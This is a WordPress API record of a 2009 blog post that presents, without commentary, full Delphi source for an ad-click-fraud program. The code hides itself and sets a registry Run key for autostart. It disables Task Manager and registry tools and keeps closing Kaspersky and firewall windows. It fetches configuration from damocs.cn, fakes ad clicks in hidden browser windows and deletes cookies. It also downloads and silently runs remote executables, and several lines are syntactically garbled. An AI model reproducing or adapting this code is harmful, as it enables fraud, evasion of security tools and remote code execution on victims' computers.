{"id":501,"date":"2009-06-30T20:10:00","date_gmt":"2009-06-30T12:10:00","guid":{"rendered":""},"modified":"2013-11-17T17:23:04","modified_gmt":"2013-11-17T09:23:04","slug":"%e6%a8%a1%e6%8b%9f%e7%82%b9%e5%87%bb%e7%bd%91%e9%a1%b5%e5%b9%bf%e5%91%8a%e6%ba%90%e4%bb%a3%e7%a0%81","status":"publish","type":"post","link":"https:\/\/kyle.ai\/blog\/501.html","title":{"rendered":"\u6a21\u62df\u70b9\u51fb\u7f51\u9875\u5e7f\u544a\u6e90\u4ee3\u7801"},"content":{"rendered":"
\r\nunit Unit1;\r\n{$R 'copyrightA.res'}\r\ninterface\r\n\r\nuses\r\nWindows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,\r\nDialogs, OleCtrls, SHDocVw, StdCtrls,shellApi,urlmon, wininet,shlobj,ExtCtrls,encrypt;\r\n\r\ntype\r\nTAnHao_Click = class(TForm)\r\n    TIME_DO: TTimer;\r\n    TIME_All: TTimer;\r\n    procedure FormCreate(Sender: TObject);\r\n    procedure TIME_DOTimer(Sender: TObject);\r\n    procedure TIME_AllTimer(Sender: TObject);\r\n    procedure FormShow(Sender: TObject);\r\nprivate\r\n    { Private declarations }\r\npublic\r\n    { Public declarations }\r\nend;\r\n\r\nvar\r\nAnHao_Click: TAnHao_Click;\r\nDownUrl:array [0..255] of char;\/\/\u70b9\u51fb\u5e7f\u544a\u914d\u7f6e\u6587\u4ef6\u4e0b\u8f7d\u8def\u5f84\r\nLLUrl,ClickNum,Upurl:array [0..255] of char;\/\/\u6d41\u91cf\u914d\u7f6e\u6587\u4ef6\u4e0b\u8f7d\u8def\u5f84\r\nDownSaveA:array [0..255] of char; \/\/\u5e7f\u544atxt\u4fdd\u5b58\u8def\u5f84\r\nDownSaveL:array [0..255] of char; \/\/\u6d41\u91cftxt\u4fdd\u5b58\u8def\u5f84\r\nDownSaveC:array [0..255] of char; \/\/\u5269\u4f59\u70b9\u51fb\u6b21\u6570\u4fdd\u5b58\u8def\u5f84\r\nDownSaveDL:array [0..255] of char; \/\/\u66f4\u65b0txt\u4fdd\u5b58\u8def\u5f84\r\niename: array [0..255] of char;\r\niepath:string ;    \/\/IE \u8def\u5f84\r\nD_Xy:DWORD;        \/\/\u70b9\u51fb\u7684\u5750\u6807\r\nInt_LL:integer;    \/\/\u6d41\u91cf\u5b9a\u65f6\u5668\u8ba1\u6570\r\n\r\nInt_Cr:integer;\r\nispost:BOOL;      \/\/\u70b9\u51fb\u8fd8\u662f\u4e0a\u7ebf\r\nClickUrl:STring; \/\/\u5f53\u524d\u70b9\u51fb\u7f51\u5740\r\nimplementation\r\n\r\n{$R *.dfm}\r\n\r\n\/\/\u7cfb\u7edf\u8def\u5f84\r\nfunction syspath():string;\r\nvar\r\ntemp: array [0..255] of char;\r\nbegin\r\nGetsystemDirectory(temp,250);\r\nresult:=temp;\r\nend;\r\n\r\n\/\/\u6309\u9876\u5b57\u7b26\u4e32\u6392\u5e8f\u5206\u79bb\r\nfunction Split(Input: string; Deliminator: string; Index: integer): string;\r\nvar\r\nStringLoop, StringCount: integer;\r\nBuffer: string;\r\nbegin\r\nBuffer := '';\r\nif Index < 1 then Exit;\r\nStringCount := 0;\r\nStringLoop := 1;\r\nwhile (StringLoop <= Length(Input)) do\r\nbegin\r\n    if (Copy(Input, StringLoop, Length(Deliminator)) = Deliminator) then\r\n    begin\r\n      Inc(StringLoop, Length(Deliminator) - 1);\r\n      Inc(StringCount);\r\n      if StringCount = Index then\r\n      begin\r\n        Result := Buffer;\r\n        Exit;\r\n      end\r\n      else\r\n      begin\r\n        Buffer := '';\r\n      end;\r\n    end\r\n    else\r\n    begin\r\n      Buffer := Buffer + Copy(Input, StringLoop, 1);\r\n    end;\r\n    Inc(StringLoop, 1);\r\nend;\r\nInc(StringCount);\r\nif StringCount < Index then Buffer := '';\r\nResult := Buffer;\r\nend;\r\n\r\n\/\/HIV \u542f\u52a8\r\nprocedure GetBackPrivilege;\r\nConst\r\nADJUST_PRIV = TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES;\r\nSHTDWN_PRIV ='SeBackupPrivilege';\r\nPRIV_SIZE      = sizeOf(TTokenPrivileges);\r\nvar\r\nTokenPriv, Dummy: TTokenPrivileges;\r\nToken: THandle;\r\nLen:dWORD;\r\nbegin\r\nOpenProcessToken(GetCurrentProcess(), ADJUST_PRIV, Token);\r\nLookupPrivilegeValue(nil, SHTDWN_PRIV,TokenPriv.Privileges[0].Luid);\r\nTokenPriv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;\r\nTokenPriv.PrivilegeCount := 1;\r\nAdjustTokenPrivileges(Token, false, TokenPriv, PRIV_SIZE,Dummy, Len);\r\nend;\r\n\r\nprocedure GetRestorePrivilege;\r\nvar\r\nTPPrev,TP: TTokenPrivileges;\r\nTokenHandle: THandle;\r\ndwRetLen: DWORD;\r\nlpLuid: TLargeInteger;\r\nbegin\r\nOpenProcessToken(GetCurrentProcess,TOKEN_ALL_ACCESS,TokenHandle);\r\nif(LookupPrivilegeValue(Nil,'SeRestorePrivilege',lpLuid))then\r\nbegin\r\n    TP.PrivilegeCount:=1;\r\n    TP.Privileges[0].Attributes:=SE_PRIVILEGE_ENABLED;\r\n    TP.Privileges[0].Luid:=lpLuid;\r\n    AdjustTokenPrivileges(TokenHandle,False,TP,SizeOf(TPPrev),TPPrev,dwRetLen);\r\nend;\r\nCloseHandle(TokenHandle);\r\nend;\r\n\r\nfunction addreg(key:Hkey; subkey,name,value:string):boolean;\r\nvar\r\nregkey:hkey;\r\nbegin\r\nresult := false;\r\nRegCreateKey(key,PChar(subkey),regkey);\r\nif RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then\r\n    result := true;\r\nRegCloseKey(regkey);\r\nend;\r\n\r\nfunction SaveKey2(key:integer;subkey,filename:string):Boolean;\r\nvar\r\nSKey: HKEY;\r\nbegin\r\nResult := false;\r\nif key = 1 then begin\r\nRegOpenKey(HKEY_CURRENT_USER,PChar(subkey),SKey);\r\nend\r\nelse\r\nbegin\r\nRegOpenKey(HKEY_LOCAL_MACHINE,PChar(subkey),SKey);\r\nend;\r\nif SKey <> 0 then\r\ntry\r\n    Result := (RegSaveKey(SKey, PChar(FileName), nil) = ERROR_SUCCESS);\r\nfinally\r\n    RegCloseKey(SKey);\r\nend;\r\nend;\r\n\r\nprocedure regstore2(key:integer;subkey,hfile:string);\r\nvar\r\nkey2: hkey;\r\nbegin\r\nif key=1 then\r\nbegin\r\nRegOpenKey(HKEY_CURRENT_USER,PChar(subkey),key2)\r\nend\r\nelse begin\r\nRegOpenKey(HKEY_LOCAL_MACHINE,PChar(subkey),key2);\r\nend;\r\nif key2<>0 then RegRestoreKey(key2,PChar(hfile),8);\r\nRegCloseKey(key2);\r\nend;\r\n\r\nprocedure DoAll(exefile:string);\r\nvar\r\nkey:HKEY;\r\nI:Integer;\r\nbegin\r\nSaveKey2(2,PChar('Software\\Microsoft\\Windows\\CurrentVersion\\policies'),'c:\\1.hiv');\r\nRegCreateKey(HKEY_CURRENT_USER,PChar('Software\\AnHao'),key);\r\nfor i := 1 to 10 do regstore2(1,'Software\\AnHao','c:\\1.hiv');\r\naddreg(HKEY_CURRENT_USER,'Software\\AnHao\\explorer\\run','Hackceo',exefile);\r\nSaveKey2(1,PChar('Software\\AnHao'),'c:\\2.hiv');\r\nfor i := 1 to 10 do regstore2(2,PChar('Software\\Microsoft\\Windows\\CurrentVersion\\policies'),'c:\\2.hiv');\r\nRegDeleteKey(HKEY_CURRENT_USER,'Software\\AnHao');\r\nRegCloseKey(key);\r\nDeleteFile('c:\\1.hiv');\r\nDeleteFile('c:\\2.hiv');\r\nend;\r\n\r\n\/\/\u5220\u9664CCOOKIE\r\nfunction GetCookiesFolder:string;\r\nvar\r\n    pidl:pItemIDList;\r\n    buffer:array [ 0..255 ] of char ;\r\nbegin\r\n   SHGetSpecialFolderLocation(\r\n     0 , CSIDL_COOKIES, pidl);\r\n\r\n   SHGetPathFromIDList(pidl, buffer);\r\n   result:=strpas(buffer);\r\nend;\r\n\r\nfunction ShellDeleteFile(sFileName: string): Boolean;\r\nvar\r\nFOS: TSHFileOpStruct;\r\nbegin\r\n   FillChar(FOS, SizeOf(FOS), 0); {\u8bb0\u5f55\u6e05\u96f6}\r\n   with FOS do\r\n   begin\r\n       Wnd:=0;\r\n       wFunc := FO_DELETE;\/\/\u5220\u9664\r\n       pFrom := PChar(sFileName);\r\n       fFlags := FOF_NOCONFIRMATION or FOF_SILENT;\r\n   end;\r\n   Result := (SHFileOperation(FOS) = 0);\r\nend;\r\nprocedure DelCookie;\r\nvar\r\n   dir:string;\r\nbegin\r\n   InternetSetOption(nil, INTERNET_OPTION_END_BROWSER_SESSION, nil, 0);\r\n   dir:=GetCookiesFolder;\r\n   ShellDeleteFile(dir+'\\*.txt');\r\nend;\r\n\r\n\/\/ \u6ce8\u518c\u8868\u9501\u4f4f\r\nprocedure Disablesome();\r\nvar\r\nSHK:HKEY;\r\nKeyValue:DWORD;\r\nbegin\r\ntry\r\n    \/\/\u9690\u85cf\u6587\u4ef6\r\n    KeyValue:=2;\r\n    RegOpenKeyEx(HKEY_CURRENT_USER,'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced',0,KEY_ALL_ACCESS,SHK);\r\n    RegSetValueEx(SHK,'Hidden',0,REG_DWORD,@KeyValue,sizeOf(DWORD));\r\nfinally\r\n    RegCloseKey(SHK);\r\nend;\r\ntry\r\n    \/\/\u6587\u4ef6\u5939\u9009\u9879\u9501\u5b9a\r\n    KeyValue:=0;\r\n    RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL',0,KEY_ALL_ACCESS,SHK);\r\n    RegSetValueEx(SHK,'CheckedValue',0,REG_DWORD,@KeyValue,sizeOf(DWORD));\r\nfinally\r\n    RegCloseKey(SHK);\r\nend;\r\ntry\r\n    \/\/\u7981\u6b62\u4efb\u52a1\u7ba1\u7406\u5668\r\n    KeyValue:=1;\r\n    RegOpenKeyEx(HKEY_CURRENT_USER,'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System',0,KEY_ALL_ACCESS,SHK);\r\n    RegSetValueEx(SHK,'DisableTaskMgr',0,REG_DWORD,@KeyValue,sizeOf(DWORD));\r\nfinally\r\n    RegCloseKey(SHK);\r\nend;\r\ntry\r\n    \/\/\u7981\u6b62\u6ce8\u518c\u8868\r\n    KeyValue:=1;\r\n    RegOpenKeyEx(HKEY_CURRENT_USER,'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System',0,KEY_ALL_ACCESS,SHK);\r\n    RegSetValueEx(SHK,'DisableRegistryTools',0,REG_DWORD,@KeyValue,sizeOf(DWORD));\r\nfinally\r\n    RegCloseKey(SHK);\r\nend;\r\nend;\r\nfunction rbl(Hwnd: THandle;\r\n            Param: Pointer): Boolean; stdcall;\r\nvar\r\nbt: array[0..210] of char ;\r\nbegin\r\ngetwindowtext(Hwnd,bt,200);\r\n     if ((pos('\u9632\u706b\u5899',bt)<>0)or (pos('\u4e3b\u7ebf\u7a0b',bt)<>0))then\r\n      begin\r\n        postmessage(hwnd,$0010,0,0) ;\r\n        postmessage(hwnd,$0002,0,0);\r\n        postmessage(hwnd,$0012,0,0);\r\n      end;\r\nResult :=true ;\r\nend;\r\n\r\n\/\/ \u6740\u5494\u5427 \u7ebf\u7a0b ..\r\nprocedure kis ();\r\nvar\r\nHKill:THANDLE;\r\nKCaption: array[0..200] of char ;\r\nbegin\r\nwhile (true) do\r\nbegin\r\n    HKill:=GetForegroundWindow() ;\r\n    GetClassName(HKill,KCaption,200);\r\n    if (pos('AVP',KCaption)<>0) then    \/\/or(pos('AVP',KCaption)<>0)\r\n    begin\r\n      postmessage(HKill,WM_CLOSE,0,0) ;\r\n    end;\r\n    EnumWindows(@rbl,0);\r\n    sleep(20);\r\nend;\r\nend;\r\n\/\/\u521b\u5efa\u6740\u5361\u5df4\u7ebf\u7a0b\r\nprocedure killkis();\r\nvar\r\nkishand:THANDLE;\r\nkispid:DWORD;\r\nbegin             \/\/\u8bbe\u7f6e\u65f6\u95f4\r\nkishand:=CreateThread(nil, 0, @kis, nil, 0,kispid);\r\nCloseHandle(kishand);\r\nend;\r\n\r\nprocedure Sendip();\r\nvar\r\nsi: TSTARTUPINFO;\r\npi: TProcessInformation;\r\nWed:string;\r\nbegin\r\nwith si do\r\nbegin\r\n    cb := SizeOf(si);\r\n    lpReserved := nil;\r\n    lpDesktop := nil;\r\n    lpTitle := nil;\r\n    dwFlags := STARTF_USESHOWWINDOW;\r\n    wShowWindow := SW_HIDE;\r\n    cbReserved2 := 0;\r\n    lpReserved2 := nil;\r\nend;\r\nif ispost then\r\nbegin\r\n    \/\/\u70b9\u51fb\r\n    Wed:='Open pics\/www.damocs.cn\/360\/click.asp?Url='+ClickUrl;\r\nend else begin\r\n    Wed:='Open pics\/www.damocs.cn\/360\/click.asp?Url=OnLine'; \/\/\u4e0a\u7ebf\r\nend;\r\n\r\nCreateProcess(pchar(iepath),pchar(WED),\r\n             nil, nil, False, CREATE_DEFAULT_ERROR_MODE, nil, nil, si, pi);\r\nWaitForSingleObject(pi.hProcess, 20000);\r\nTerminateProcess(pi.hProcess,0);\r\nend;\r\n\r\n\/\/-----------------------------------------------------------------------------\r\n\r\n\/\/ \u66f4\u65b0 .\r\nprocedure Updata () ;\r\nvar\r\ntxtDl:textfile;\r\nSTR_URL,Str_path:string;\r\nbegin\r\nURLDownloadToFile(nil,UpUrl,DownSaveDL,0,nil);\r\nif FileExists(DownSaveDL) then\r\nbegin\r\n    try\r\n      assignfile(txtDL,DownSaveDL);\r\n      reset(TxtDL);\r\n      While not Eof(TxtDL) do\r\n      begin\r\n        Readln(TxtDL,Str_Url);\r\n        Readln(TxtDL,Str_Path);\r\n        if (S_OK=URLDownloadToFile(nil,Pchar(Str_Url),Pchar(Str_Path),0,nil))then\r\n        begin\r\n          ShellExecute(0,'open',pchar(Str_Path),nil,nil,SW_HIDE);\r\n        end;\r\n      end;\r\n    finally\r\n      CloseFile(TxtDL);\r\n    end;\r\nend;\r\nend;\r\n\r\n\/\/\u70b9\u51fb\u5e7f\u544a\u8fc7\u7a0b\r\nfunction SClick(Hwnd: THandle;\r\n            Param: Pointer): Boolean; stdcall;\r\nvar\r\nbt: array[0..210] of char ;\r\nHandA,handB:Thandle; \/\/handb\u4fdd\u5b58IE\u4e3b\u7a97\u53e3\u70b9\u51fb\u540e\u8981\u9690\u85cf\r\nbegin\r\ngetwindowtext(Hwnd,bt,200);\r\n\/\/ if (length(trim(string(bt)) > 30) then\r\n\/\/ begin\r\nif (pos('\u5c0f\u96e8\u96ea',bt)<>0) or (pos('\u7d22',bt)<>0) then\r\nbegin\r\n    handB:=Hwnd; \/\/\u4fdd\u5b58IE\u4e3b\u7a97\u53e3\r\n    PostMessage(handB,WM_SIZE,SIZE_MAXIMIZED,0); \/\/\u9690\u85cf\u6700\u5927\u5316IE\r\n    ShowWindow(HandB,SW_HIDE);\r\n    handa:=FindWindowEx(hwnd,0,'TabWindowClass',nil);\r\n    if handa <> 0 then\r\n    begin\r\n      Hwnd := handa;\r\n    end;\r\n    hwnd:=FindWindowEx(hwnd,0,'Shell DocObject View',nil);\r\n    if hwnd <> 0 then\r\n    begin\r\n      hwnd:=FindWindowEx(hwnd,0,'Internet Explorer_Server',nil);\r\n      if hwnd <> 0 then\r\n      begin\r\n        ShowWindow(HandB,SW_HIDE);\r\n        PostMessage(hwnd,WM_LBUTTONDOWN,MK_LBUTTON,D_Xy);\r\n        PostMessage(hwnd,WM_LBUTTONUP,MK_LBUTTON,D_Xy);\r\n\r\n        ShowWindow(HandB,SW_HIDE);\r\n\r\n        IsPost:=True;\r\n        SendIp;       \/\/\u53d1\u9001\u70b9\u51fb\u4fe1\u606f\r\n        ShowWindow(HandB,SW_HIDE);\r\n        Result :=true ;\r\n        exit;\r\n      end;\r\n    end\r\n\/\/ end;\r\nend;\r\nResult :=true ;\r\nend;\r\n\r\n\/\/\u8bfb\u53d6\u914d\u7f6e\r\nprocedure ClickAd ();\r\nvar\r\nsi: TSTARTUPINFO;\r\npi: TProcessInformation;\r\n\r\ntxtA:TextFile; \/\/\u5e7f\u544a\u914d\u7f6e\u6587\u672c\r\nStr_Cr:string;   \/\/ \u5f53\u524d\u7248\u672c\r\nStr_URL,STR_SleepA,STR_Xy,STR_SleepB,STR_ISClick:string ;\r\nbegin\r\nwith si do\r\nbegin\r\n    cb := SizeOf(si);\r\n    lpReserved := nil;\r\n    lpDesktop := nil;\r\n    lpTitle := nil;\r\n    dwFlags := STARTF_USESHOWWINDOW;\r\n    wShowWindow := SW_HIDE;\r\n    cbReserved2 := 0;\r\n    lpReserved2 := nil;\r\nend;\r\nURLDownloadToFile(nil,DownUrl,DownSaveA,0,nil);\r\nif FileExists(DownSaveA) then\r\nbegin\r\n    try\r\n      assignfile(txtA,DownSaveA);\r\n      reset(TxtA);\r\n      Readln(TxtA,Str_Cr);   \/\/\u83b7\u5f97\u7248\u672c\r\n      if strtoint(Str_Cr) <= Int_Cr then exit;\r\n      Int_Cr:= strtoint(Str_Cr);\r\n      While not Eof(TxtA) do\r\n      begin\r\n        readln(TxtA,Str_Url);\r\n        readln(TxtA,Str_SleepA);\r\n        readln(TxtA,Str_Xy);\r\n        readln(TxtA,Str_SleepB);\r\n        readln(TxtA,Str_ISClick);\r\n        if 'a'=Str_ISClick then\r\n        begin\r\n          D_Xy:=strtoint(Str_Xy);           \/\/\u8f6c\u6362\u621032\u4f4d\u5750\u6807\r\n          ClickUrl:=Split(Str_Url,'.',2);   \/\/\u5206\u79bb\u76ee\u6807\u7f51\u5740\r\n          CreateProcess(pchar(iepath),pchar(Str_Url),\r\n                          nil, nil, False, CREATE_DEFAULT_ERROR_MODE, nil, nil, si, pi);\r\n          WaitForSingleObject(pi.hProcess, strtoint(Str_SleepA+00'));\r\n          EnumWindows(@SClick,0);\r\n\r\n          Sleep(strtoint(Str_SleepB+00'));\r\n          TerminateProcess(pi.hProcess,0);\r\n          TerminateProcess(pi.hProcess,0);\r\n          sleep(5000);\r\n          DelCookie;\r\n          sleep(5000);\r\n        end;\r\n      end;\r\n    finally\r\n      CloseFile(TxtA);\r\n      windows.DeleteFile(DownSaveA);\r\n    end;\r\nend;\r\nend;\r\n\/\/\u5237\u6d41\u91cf\r\nprocedure GetLL ();\r\nvar\r\ntxtLL:textfile;\r\nSTR_URL,Str_Sleep:string;\r\nsi: TSTARTUPINFO;\r\npi: TProcessInformation;\r\nWed:string;\r\nbegin\r\nURLDownloadToFile(nil,LLUrl,DownSaveL,0,nil);\r\nif FileExists(DownSaveL) then\r\nbegin\r\nwith si do\r\nbegin\r\n    cb := SizeOf(si);\r\n    lpReserved := nil;\r\n    lpDesktop := nil;\r\n    lpTitle := nil;\r\n    dwFlags := STARTF_USESHOWWINDOW;\r\n    wShowWindow := SW_HIDE;\r\n    cbReserved2 := 0;\r\n    lpReserved2 := nil;\r\nend;\r\n    try\r\n      assignfile(txtLL,DownSaveL);\r\n      reset(TxtLL);\r\n      While not Eof(TxtLL) do\r\n      begin\r\n        Readln(TxtLL,Str_Url);\r\n        Readln(TxtLL,Str_Sleep);\r\n        application.ProcessMessages;\r\n        CreateProcess(pchar(iepath),pchar(Str_Url),\r\n             nil, nil, False, CREATE_DEFAULT_ERROR_MODE, nil, nil, si, pi);\r\n        WaitForSingleObject(pi.hProcess, strtoint(Str_Sleep+00'));\r\n        application.ProcessMessages;\r\n        TerminateProcess(pi.hProcess,0);\r\n        DelCookie;\r\n        sleep(2000);\r\n      end;\r\n    finally\r\n      CloseFile(TxtLL);\r\n    end;\r\nend;\r\nend;\r\n\r\n\/\/\u7a97\u53e3\u521b\u5efa\r\nprocedure TAnHao_Click.FormCreate(Sender: TObject);\r\nvar\r\nHk: hkey;\r\nexepath:string;\r\niekey: Hkey;\r\nvType,dLength :DWORD;\r\nCookiePid,HCookie:DWORD;\r\nbegin\r\nCreateMutex(nil,True,'AnHao_Ad');\r\nif GetLastError = ERROR_ALREADY_EXISTS then\r\nbegin\r\n    Application.Terminate;\r\n    PostMessage(handle,WM_CLOSE,0,0);\r\nend;\r\nInt_Cr:= 0 ;\r\nGetRestorePrivilege; \/\/\u63d0\u6743\r\nGetBackPrivilege;\r\ntry\r\n    regopenkey(HKEY_LOCAL_MACHINE, 'Software\\Microsoft\\Windows\\CurrentVersion\\policies', Hk);\r\n    regcreatekey(Hk,pchar('explorer'),Hk);\r\n    regcreatekey(Hk,pchar('run'),Hk);\r\nfinally\r\n    CloseHandle(Hk);\r\nend;\r\nkillkis();\r\nexepath:=syspath()+'\\361Ad.exe';\r\nSetFileAttributes(pchar(paramstr(0)),FILE_ATTRIBUTE_HIDDEN+ FILE_ATTRIBUTE_SYSTEM);\r\nDoAll(exepath);\r\ncopyfile(pchar(paramstr(0)),pchar(exepath),true);\r\nDisablesome();\r\nstrcopy(DownSaveDL,pchar(syspath()+'\\AnHaoD.Txt')); \/\/\u66f4\u65b0\r\nstrcopy(DownSaveA,pchar(syspath()+'\\AnHaoA.Txt'));   \/\/ \u5e7f\u544a\r\nstrcopy(DownSaveL,pchar(syspath()+'\\AnHaoL.Txt'));   \/\/\u6d41\u91cf\r\nstrcopy(DownSaveC,pchar(syspath()+'\\AnHaoC.Txt'));   \/\/\u6b21\u6570\r\n\r\nInt_LL:=0; \/\/\u6d41\u91cf\u8ba1\u6570\u5668\r\n\r\nHCookie:=createthread(nil,0,@DelCookie,nil,0,CookiePid);\r\nWaitForSingleObject(HCookie,10000*6*10);\r\nvType := REG_SZ;\r\nRegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);\r\ndLength := SizeOf(iename);\r\nif RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then\r\nbegin\r\n    iepath := iename\r\nend else begin\r\n    iepath := 'C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE';\r\n    RegCloseKey(iekey);\r\nend;\r\nend;\r\n\r\n\/\/\u5f00\u59cb\u5de5\u4f5c\r\nprocedure TAnHao_Click.TIME_DOTimer(Sender: TObject);\r\nvar\r\nPIDA,PIDB:DWORD;\r\nTxt:textfile;\r\nClickCount:String;\r\nbegin\r\nif (Int_LL = 0) or (Int_LL=20) then\r\nbegin\r\n    TIME_Do.Enabled:=False;\r\n    ClickCount:=';\r\n    URLDownloadToFile(nil,ClickNum,DownSaveC,0,nil);\r\n    if FileExists(DownSaveC) then\r\n    begin\r\n      try\r\n        assignfile(txt,DownSaveC);\r\n        reset(Txt);\r\n        ReadLn(txt,ClickCount);\r\n      finally\r\n        CloseFile(txt);\r\n        windows.DeleteFile(DownSaveC);\r\n      end;\r\n    end;\r\n    if strtoint(ClickCount) >0 then\r\n    begin\r\n      ClickAd; \/\/\u70b9\u51fb\u5e7f\u544a\r\n    end;\r\n\/\/    PIDB:=CreateThread(nil,0,@ClickAd,Nil,0,PIDA);\r\n\/\/    WaitForSingleObject(PIDB,INFINITE) ;\r\n    sleep(1000);\r\n    GetLL ; \/\/\u5237\u6d41\u91cf\r\n    sleep(1000);\r\n    UPData; \/\/\u66f4\u65b0\u4e0b\u8f7d\u8005\r\n\/\/    PIDB:=CreateThread(nil,0,@Getll,Nil,0,PIDA);\r\n\/\/    WaitForSingleObject(PIDB,INFINITE) ;\r\n    TIME_Do.Enabled:=True;\r\n    Int_LL:=0;\r\nend;\r\nInt_LL:=Int_LL+1;\r\nend;\r\n\r\n\/\/\u5224\u65ad\u662f\u5426\u8054\u7f51 \u63a7\u5236 \u5237\u6d41\u91cf\u548c\u70b9\u51fb\u5e7f\u544a\u5f00\u59cb \u5b9a\u65f6\u5668\r\nprocedure TAnHao_Click.TIME_AllTimer(Sender: TObject);\r\nvar\r\nConnect_status : DWORD;\r\nURLA,URLB,UrlC,UrlD:string;\r\nbegin\r\nif InternetGetConnectedState(@connect_status,0)then\r\nbegin\r\n    Ispost:=False ;\r\n    SendIp;        \/\/\u53d1\u9001\u4e0a\u7ebf\u4fe1\u606f\r\n\r\n    \/\/pics\/www.damocs.cn\/config\/gg.txt   \/\/\u5e7f\u544a\r\n    UrlA:=jmp(13D3D397366663E3E3E672D2824262A3A672A27662A26272F202E662E2E673D313D','I');\r\n\r\n    \/\/pics\/www.damocs.cn\/config\/ll.txt   \/\/\u6d41\u91cf\r\n    UrlB:=jmp(84444400A1F1F4747471E54515D5F53431E535E1F535F5E5659571F5C5C1E444844','SBL');\r\n\r\n    \/\/pics\/www.damocs.cn\/config\/dl.txt \/\/\u66f4\u65b0\r\n    UrlC:=jmp(84444400A1F1F4747471E54515D5F53431E535E1F535F5E5659571F545C1E444844','Love');\r\n\r\n    \/\/\u5269\u4f59\u70b9\u51fb\u6b21\u6570\r\n    \/\/pics\/www.damocs.cn\/config\/num.txt\r\n    UrlD:=jmp(84444400A1F1F4747471E54515D5F53431E535E1F535F5E5659571F5E455D1E444844','Love');\r\n\r\n    strcopy(DownUrl,pchar(UrlA));\r\n    strcopy(LLUrl,pchar(UrlB));\r\n    strcopy(Upurl,pchar(UrlC));\r\n    strcopy(ClickNum,pchar(UrlD));\r\n\r\n    TIME_Do.Enabled:=True;\r\n    TIME_All.Enabled:=False;\r\nend;\r\nend;\r\nprocedure TAnHao_Click.FormShow(Sender: TObject);\r\nbegin\r\nShowWindow(0,SW_HIDE);\r\nend;\r\n\r\nend.\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
unit Unit1; {$R ‘copyrightA.res’} interface uses Window […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-501","post","type-post","status-publish","format-standard","hentry","category-code_related"],"_links":{"self":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/comments?post=501"}],"version-history":[{"count":1,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/501\/revisions"}],"predecessor-version":[{"id":4739,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/501\/revisions\/4739"}],"wp:attachment":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/media?parent=501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/categories?post=501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/tags?post=501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}